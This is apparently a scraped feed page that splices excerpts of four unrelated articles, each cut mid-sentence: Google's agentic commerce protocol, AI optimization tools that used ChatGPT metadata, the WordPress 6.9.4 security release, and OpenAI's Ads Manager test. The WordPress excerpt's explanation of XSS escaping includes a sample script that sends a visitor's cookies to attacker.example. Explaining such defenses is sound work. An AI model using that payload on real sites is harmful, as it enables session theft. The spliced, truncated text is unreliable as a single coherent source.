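    """Step 4: native checkout completes inside the AI surface; embedded hands off
    to an iframe. Either way, the brand remains the merchant of record."""
    return {"status": "confirmed", "mode": mode, "charged": product.price}

candidates = match_products(max_price=250.00, size="11", min_rating=4.8)
order = next((execute_checkout(p) for p in candidates if verify_availability(p)), None)
print(order)
```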
Regardless of the path, the transaction is executed against the merchant’s existing systems, ensuring that inventory counts and financial records remain accurate and centralized. Mastering Feed Data Hygiene for the AI Era In the world of UCP, your product feed is no longer just a list of items for Google Shopping ads; it is the primary training set and sales manual for Google’s AI agents. If your data is vague, the AI will not recommend your products. To succeed, brands must move beyond basic data entry and embrace high-level feed hygiene. Advanced Product Descriptions and Titles In traditional SEO, we often optimize titles for keywords. In agentic commerce, we optimize for semantic clarity. Google recommends product titles that are at least 30 characters long, providing enough context for an LLM to understand the nuances of the item. Even more critical is the description. While many feeds use short, punchy blurbs, UCP-ready feeds should aim for 500 characters or more. This extra space allows you to detail materials, use cases, compatibility, and specific features that an AI can use to answer specific user questions. The Role of GTINs and Identifiers Accuracy is the currency of AI commerce. Including Global Trade Item Numbers (GTINs) is non-negotiable for brands that want to be featured in UCP transactions. GTINs allow Google to cross-reference your product with a global database, ensuring that when a user asks for a specific brand and model, the AI knows with 100% certainty that your listing is the correct one. Without these identifiers, your products risk being filtered out of conversational results due to a lack of “confidence” from the model. Visual Information as Data AI models are increasingly multi-modal, meaning they “see” images as well as read text. For UCP success, a single product shot on a white background is the bare minimum. Google suggests including at least three additional images. These should include lifestyle shots that show the product in use, which helps the AI understand the context of the item. Furthermore, high-resolution imagery—at least 1,500 by 1,500 pixels—is essential for the visual clarity required in modern AI interfaces. Leveraging Trust and Convenience Signals When a user allows an AI to make a purchase for them, they are delegating trust. To facilitate this, the Universal Commerce Protocol relies heavily on trust and convenience signals embedded within the Merchant Center feed. These signals act as “conversion boosters” that the AI uses to tip the scales in favor of one brand over another. Key attributes that must be prioritized include: Shipping Speed and Cost: Clearly stating “Free Shipping” and providing specific timelines (e.g., “Next-day delivery”) can be the deciding factor when an AI compares two identical products. Return Policies: Transparency regarding returns reduces the perceived risk for the consumer. Having a clear, generous return policy mapped correctly in your feed attributes is

The Shortcut Behind Some AI Optimization Tools

Understanding the Mechanics of Modern AI Optimization The rapid evolution of generative artificial intelligence has created a secondary market of tools designed to optimize, track, and reverse-engineer how these models think. From SEO professionals trying to understand “Generative Engine Optimization” (GEO) to developers building wrappers around existing Large Language Models (LLMs), the ecosystem is currently in a state of hyper-growth. However, a recent shift in how OpenAI handles its internal query metadata has highlighted a significant vulnerability in the industry: the reliance on unofficial shortcuts. For months, some AI optimization tools relied on a specific technical loophole known as “query fan-out” metadata. This data, which was visible in the background of ChatGPT’s web interface, provided a window into how the model processed complex prompts. When this metadata suddenly disappeared, it didn’t just break a few niche features—it exposed the fundamental fragility of tools built on unofficial access rather than stable, documented APIs. What is Query Fan-Out and Why Does It Matter? To understand why this metadata was so valuable, one must first understand the concept of “query fan-out.” In the context of large language models and search engines, a fan-out occurs when a single, high-level user prompt is decomposed into multiple, more specific sub-queries. For example, if a user asks ChatGPT, “Compare the impact of the industrial revolution in London versus Tokyo,” the model doesn’t just look for one answer. It “fans out” that query into several background searches: one for London’s industrial timeline, one for Tokyo’s, and perhaps another for comparative economic metrics. This process is essential for accuracy. By breaking a complex request into manageable chunks, the AI can synthesize a more comprehensive and factual response. For developers and SEOs, the metadata associated with this fan-out was a goldmine. It revealed exactly what the AI was looking for, which sources it was prioritizing, and how it was structuring its internal logic to satisfy the user’s intent. The Shortcut: Leveraging Unofficial Metadata Building a robust AI tool is expensive and time-consuming. It requires official API access, rigorous data science, and an understanding of high-level architecture. However, many developers found a shortcut. By scraping or intercepting the metadata that ChatGPT’s web interface transmitted back to the client, they could access the “thinking process” of the model for free, or at a much lower cost than using official enterprise channels. This metadata often included information about which specific plugins were being called, how queries were being routed to different sub-models, and the specific search terms the AI used when browsing the web. For an SEO tool, knowing exactly what keywords an AI uses to research a topic is the equivalent of seeing a competitor’s internal strategy document. It allowed these tools to promise users an “inside look” at AI behavior—an edge that felt like magic until the source was cut off. The Fragility of the “Wrapper” Economy The disappearance of this metadata underscores a hard truth in the tech world: if you build your business on someone else’s undocumented features, you don’t actually own your product. This is often referred to as the “wrapper” problem. Many AI startups are essentially thin layers of software built on top of OpenAI, Anthropic, or Google. 
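For contrast, here is roughly what such a thin layer looks like when it is built on the documented OpenAI Python SDK rather than on intercepted interface metadata. The "fan-out" in this sketch is performed explicitly on the client side to mirror the London-versus-Tokyo example; it does not expose the model's own hidden sub-queries, and the model name is only illustrative.

```python
# A minimal "wrapper" sketch built on the documented OpenAI Python SDK
# (openai>=1.0) instead of scraped interface metadata. The fan-out below is a
# client-side decomposition written for illustration; it does not reveal the
# model's internal sub-queries. Model name is illustrative.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def fan_out(prompt: str) -> list[str]:
    """Decompose a broad request into narrower sub-queries we control and can log.
    Hard-coded here to mirror the article's London/Tokyo example."""
    return [
        f"{prompt} -- focus on London",
        f"{prompt} -- focus on Tokyo",
        f"{prompt} -- comparative economic metrics",
    ]

def answer(prompt: str) -> str:
    """Ask each sub-query through the official API and stitch the results together."""
    partial_answers = []
    for sub_query in fan_out(prompt):
        response = client.chat.completions.create(
            model="gpt-4o-mini",
            messages=[{"role": "user", "content": sub_query}],
        )
        partial_answers.append(response.choices[0].message.content)
    return "\n\n".join(partial_answers)

print(answer("Compare the impact of the industrial revolution in London versus Tokyo"))
```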
While these wrappers provide value through better user interfaces or niche functionality, they are entirely at the mercy of the underlying platform. When OpenAI decided to hide or remove the query fan-out metadata, it likely wasn’t an attack on third-party developers. More likely, it was a routine update to improve security, reduce latency, or clean up the code. Regardless of the intent, the result was the same: tools that relied on that specific stream of data ceased to function. This illustrates why “unofficial access” is a dangerous foundation for any enterprise-grade software. The Risks of Unofficial APIs and Scraping Using unofficial pathways to gather data from AI models presents several risks to both developers and their end-users: Unpredictability: Platforms like OpenAI can change their internal data structures at any moment without notice. Unlike an official API, there is no versioning and no “grace period” for updates. Security Concerns: Tools that intercept web traffic or use browser extensions to scrape metadata can introduce security vulnerabilities for the users who install them. Legal and Ethical Hurdles: Scraping data against a platform’s Terms of Service can lead to IP bans, legal cease-and-desist orders, and the eventual shuttering of the tool. Data Integrity: Metadata meant for internal UI rendering isn’t always accurate for data analysis. Relying on it can lead to “hallucinations” in the optimization tools themselves. The Impact on SEO and Digital Marketing For the SEO community, the loss of visibility into AI query fan-outs is a significant blow to “Generative Engine Optimization” efforts. As search shifts from a list of blue links to AI-generated summaries (like Google’s AI Overviews or SearchGPT), marketers are desperate to know how to get their content cited. The fan-out metadata was the closest thing the industry had to a “ranking factor” report for AI. Without this data, SEOs are back to a state of observational testing. We can see the output, but we can no longer see the intermediate steps the AI took to get there. This makes it harder to determine if an AI ignored a piece of content because of its technical structure, its lack of authority, or simply because the AI’s internal sub-queries didn’t happen to trigger a search that included that specific site. Moving from Shortcuts to Sustainability Despite the setback, this shift is actually a positive development for the long-term health of the AI industry. It forces a move away from “hacks” and toward sustainable, data-driven strategies. For those looking to build or use AI optimization tools, the focus should now shift to several key areas: 1. Official API Integration Stable tools must be built on official APIs. While OpenAI’s API might not reveal the exact same “fan-out” metadata that the web interface once did, it provides a consistent and legal framework for building applications. Developers who use official channels

WordPress Security Release 6.9.4 Fixes Issues 6.9.2 Failed To Address

The Critical Importance of the WordPress 6.9.4 Security Update

WordPress remains the most popular content management system (CMS) in the world, powering over 40% of all websites on the internet. Because of this massive market share, it is a constant target for malicious actors. Security maintenance is a perpetual game of cat and mouse, where the WordPress Core Security Team works tirelessly to identify and patch vulnerabilities before they can be exploited at scale. The release of WordPress 6.9.4 marks a significant moment in this ongoing effort, as it specifically addresses security gaps that remained open following the previous 6.9.2 update.

For website administrators, SEO professionals, and digital agencies, the release of a security-focused update is more than just a routine technical notification. It is a call to action. When a security release is issued to fix issues that a previous version failed to resolve, it indicates that the initial patch may have been incomplete or that a bypass was discovered. WordPress 6.9.4 is a mandatory maintenance release for those still running the 6.9 branch, ensuring that the vulnerabilities originally targeted in version 6.9.2 are finally and fully mitigated.

Why Version 6.9.2 Fell Short

In the world of software development, security patches are often complex. A vulnerability might involve a specific way that data is handled, sanitized, or escaped within the CMS core. When WordPress 6.9.2 was released, its primary objective was to close specific security loopholes. However, security is rarely a static target. Once a patch is released, security researchers and “white hat” hackers often scrutinize the fix to ensure it is robust.

In the case of the issues addressed in 6.9.4, it appears that the mitigations introduced in 6.9.2 did not cover every possible attack vector. This is often referred to as an “incomplete fix.” For example, a patch might prevent a specific type of Cross-Site Scripting (XSS) attack in one area of the dashboard but fail to account for a similar execution path in another. By releasing 6.9.4, the WordPress development team is acknowledging these gaps and providing a more comprehensive shield for sites that remain on the 6.9 branch.

The Risks of Incomplete Patching

The danger of an incomplete patch is that it can give administrators a false sense of security. A site owner might see that they have updated to 6.9.2 and believe their site is protected against the latest known threats. Meanwhile, attackers who have analyzed the 6.9.2 patch may have already identified the remaining vulnerabilities. This makes the 6.9.4 release essential; it effectively “plugs the leaks” that the previous version missed, hardening the environment against exploitation.

Technical Overview: What is Being Fixed?

While the specific technical details of security vulnerabilities are often kept partially obscured until the majority of the ecosystem has updated, the primary focus of these types of short-cycle releases generally revolves around core hardening. In the context of the 6.9.x branch, these fixes often involve critical areas such as:

1. Cross-Site Scripting (XSS) Mitigations

XSS vulnerabilities allow attackers to inject malicious scripts into webpages viewed by other users. This is particularly dangerous in a CMS like WordPress, where an attacker could potentially hijack an administrator’s session, leading to a full site takeover.
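The underlying principle behind this class of fix can be illustrated outside of WordPress itself. The short Python example below is not the actual patch (the core fixes live in PHP and are not detailed publicly); it simply shows how escaping turns attacker-supplied markup into inert text.

```python
import html

# Generic illustration of the escaping principle behind XSS fixes. This is not
# WordPress's patch code, just the idea: untrusted input is rendered as inert
# text instead of being interpreted as markup or script.
untrusted_comment = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'

# Unsafe: dropping raw input into a page lets the script run in a visitor's browser.
unsafe_output = f"<p>{untrusted_comment}</p>"

# Safe: escaping converts the angle brackets and quotes into harmless entities.
safe_output = f"<p>{html.escape(untrusted_comment)}</p>"

print(unsafe_output)
print(safe_output)
```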
Version 6.9.4 focuses on refining how the core handles certain types of data input to ensure that scripts cannot be executed inadvertently. 2. Data Sanitization and Escaping One of the most common ways vulnerabilities arise is through improper data handling. If a user provides input that isn’t properly sanitized before being stored in the database or displayed on a page, it can lead to SQL injection or XSS. The 6.9.4 release includes improved logic for data escaping, ensuring that even if a malicious string is entered, it is treated as harmless text rather than executable code. 3. Strengthening the REST API The WordPress REST API is a powerful tool for developers, but it also provides a significant surface area for potential attacks. Recent security updates across all WordPress versions have focused heavily on ensuring that API endpoints are properly authenticated and that data passed through these endpoints is strictly validated. The fixes in 6.9.4 likely touch upon these interfaces to prevent unauthorized data access or modification. The Importance of Backported Security Updates One might wonder why WordPress is releasing updates for version 6.9 when much newer versions are available. This is due to the WordPress project’s commitment to “backporting” security fixes. Backporting is the practice of taking a security fix developed for the most recent version of the software and applying it to older versions that are still in significant use. Many enterprise-level websites and large-scale networks remain on older versions of WordPress (like the 6.9 branch) to maintain compatibility with legacy plugins, custom-coded themes, or specific server environments. By providing updates like 6.9.4, WordPress ensures that these users stay protected without being forced into a major version upgrade that might break their site’s functionality. This approach is a cornerstone of WordPress’s reliability in the professional sphere. SEO Implications of Unpatched Vulnerabilities From an SEO perspective, security is a top-tier priority. Search engines like Google and Bing prioritize the safety of their users. If a website is compromised due to a vulnerability that could have been fixed by an update like 6.9.4, the SEO consequences can be devastating and long-lasting. Search Engine Blacklisting If Google detects malware or suspicious scripts on your site, it may display a “This site may be hacked” warning in the search results. In more severe cases, the site may be removed from the index entirely until the issue is resolved. This leads to an immediate and total loss of organic traffic. Malicious Redirects Attackers often use vulnerabilities to implement “sneaky redirects.” When a user clicks your link in search results, they are redirected to a phishing site or a page selling illicit goods. Not only does this destroy your brand’s reputation, but search engine algorithms will quickly detect the poor user experience and drop your

Uncategorized

OpenAI tests Ads Manager as ChatGPT ad business takes shape

The Dawn of ChatGPT Advertising: OpenAI Begins Testing Ads Manager

For nearly two years, the tech world has speculated about how OpenAI would eventually monetize its flagship product beyond subscription tiers. While ChatGPT Plus and Enterprise licenses provide a steady stream of revenue, the true "holy grail" of digital monetization has always been advertising. Now that vision is becoming a reality: OpenAI has officially begun testing a dedicated Ads Manager dashboard with a select group of brand partners, signaling a major shift in how the world's most famous AI assistant operates.

As the company transitions from a research-focused entity into a full-scale digital advertising player, it faces the monumental task of challenging Google's decades-long dominance in the search market. The introduction of an Ads Manager is the first step in building the infrastructure required to manage, scale, and optimize campaigns within a conversational interface. However, early data suggests that while the potential is vast, the road to parity with traditional search engines is paved with significant challenges.

What is the OpenAI Ads Manager?

The new Ads Manager is a self-serve dashboard designed to give marketers a centralized hub for their ChatGPT campaigns. In the earliest stages of OpenAI's advertising experiments, brands were largely operating in the dark: performance data was delivered via weekly CSV files, a manual and antiquated process far removed from the real-time environment of modern programmatic advertising. With the rollout of this dashboard, early testers can now launch, monitor, and optimize their campaigns in real time.

This move brings ChatGPT's advertising capabilities closer to the industry standards set by Meta Ads Manager and Google Ads. Marketers can see how their "sponsored responses" or suggested links are performing, allowing for immediate adjustments to creative assets, targeting, and budget allocation. By providing a formal interface, OpenAI is signaling to the market that it is ready for enterprise-level investment; it moves the conversation from "experimental sponsorships" to a "scalable ad channel." For digital marketers, this is a pivotal moment: it marks the beginning of a new era in which visibility isn't just about ranking on page one of a search engine, but about being the recommended answer in a private, AI-driven conversation.

The Entry Price: High Stakes for Early Adopters

Innovation rarely comes cheap, and OpenAI is setting a high bar for those who want a seat at the table during this testing phase. According to industry reports, some early participants have been asked to commit a minimum spend of $200,000. This steep entry price serves several purposes for OpenAI. First, it ensures that the data gathered during the testing phase comes from high-quality, large-scale campaigns; by working with major brands that have significant creative and analytical resources, OpenAI can better refine its algorithm. Second, it limits the platform to sophisticated advertisers who understand the risks of early-stage tech. These "first movers" are effectively paying for the privilege of being the first to understand how ChatGPT users interact with paid content.

However, the $200,000 threshold also highlights a temporary barrier to entry for small and medium-sized businesses (SMBs). While Google and Meta built their empires on the backs of millions of small advertisers, OpenAI is currently focused on the top of the pyramid.
As the platform matures and the Ads Manager becomes more automated, these entry costs can be expected to drop, eventually opening the door to the broader marketing community.

Performance Comparison: ChatGPT vs. Google Search

The most critical question for any advertiser is: does it work? Early performance signals from the ChatGPT ad tests have been mixed. Specifically, click-through rates (CTR) on ChatGPT ads are currently trailing those seen on traditional Google Search results (a short sketch of how such CTR comparisons can be computed from exported data appears at the end of this article).

There are several logical reasons for this performance gap. Google Search is built on commercial intent: when a user searches for "best running shoes," they are often in a buying mindset, making them highly receptive to a well-placed ad. In contrast, ChatGPT is used for a wide range of activities, such as coding, brainstorming, writing, and learning, where a purchase may not be the immediate goal.

Furthermore, user behavior in a chat interface is fundamentally different. On a Search Engine Results Page (SERP), users are accustomed to scanning a list of links and clicking the most relevant one. In a conversation with an AI, the user is focused on the text of the response. If an ad feels intrusive or irrelevant to the flow of the conversation, users may ignore it or, worse, find it annoying. OpenAI's challenge is to refine its ad delivery so that recommendations feel like a natural extension of the helpful advice the AI is already providing.

Understanding the "Intent Gap"

To bridge the performance gap with Google, OpenAI must master the art of contextual relevance. Traditional search relies on keywords; conversational AI relies on context. If a user is asking ChatGPT how to plan a trip to Italy, an ad for a flight aggregator or a boutique hotel in Rome is highly relevant. If the ad is for a generic travel insurance company that doesn't fit the tone of the conversation, the CTR will naturally suffer. The Ads Manager is the tool that will eventually allow advertisers to fine-tune these contextual triggers.

How Ads Work Inside a Conversational Interface

The format of advertising in ChatGPT is still evolving, but it looks very different from the banners and pop-ups of the early web. Rather than traditional display ads, OpenAI is experimenting with "sponsored suggestions" and integrated citations. When a user asks a question, the AI might provide a comprehensive answer and include a "suggested next step" or a "source for more information" that is actually a paid placement. For example, if a user asks for a recipe, the AI might suggest specific branded ingredients available at a nearby retailer. The goal is to make the ad feel like a part of the utility of the tool.

This approach presents a unique set of challenges for copywriters and digital strategists. In the world of AI advertising, "ad copy" has to read like genuinely useful guidance rather than an interruption.
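On the measurement side, the CTR comparison discussed above is straightforward arithmetic: clicks divided by impressions. Since early testers reportedly received performance data as weekly CSV exports, the sketch below shows how an analyst might compute CTR per channel from such a file. The file name and column names are hypothetical, as OpenAI has not published a reporting schema.

```python
# Hypothetical sketch: comparing click-through rate (CTR) by channel from a
# weekly performance export. File name and column names are invented for
# illustration; OpenAI has not published an Ads Manager reporting schema.
import csv
from collections import defaultdict

def ctr_by_channel(path: str) -> dict:
    totals = defaultdict(lambda: {"impressions": 0, "clicks": 0})
    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            channel = row["channel"]  # e.g. "chatgpt", "google_search"
            totals[channel]["impressions"] += int(row["impressions"])
            totals[channel]["clicks"] += int(row["clicks"])
    # CTR = clicks / impressions, expressed here as a percentage.
    return {
        ch: round(100 * t["clicks"] / t["impressions"], 2)
        for ch, t in totals.items() if t["impressions"]
    }

# Example output shape: {"chatgpt": 0.84, "google_search": 1.92} (illustrative numbers only).
print(ctr_by_channel("weekly_report.csv"))
```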
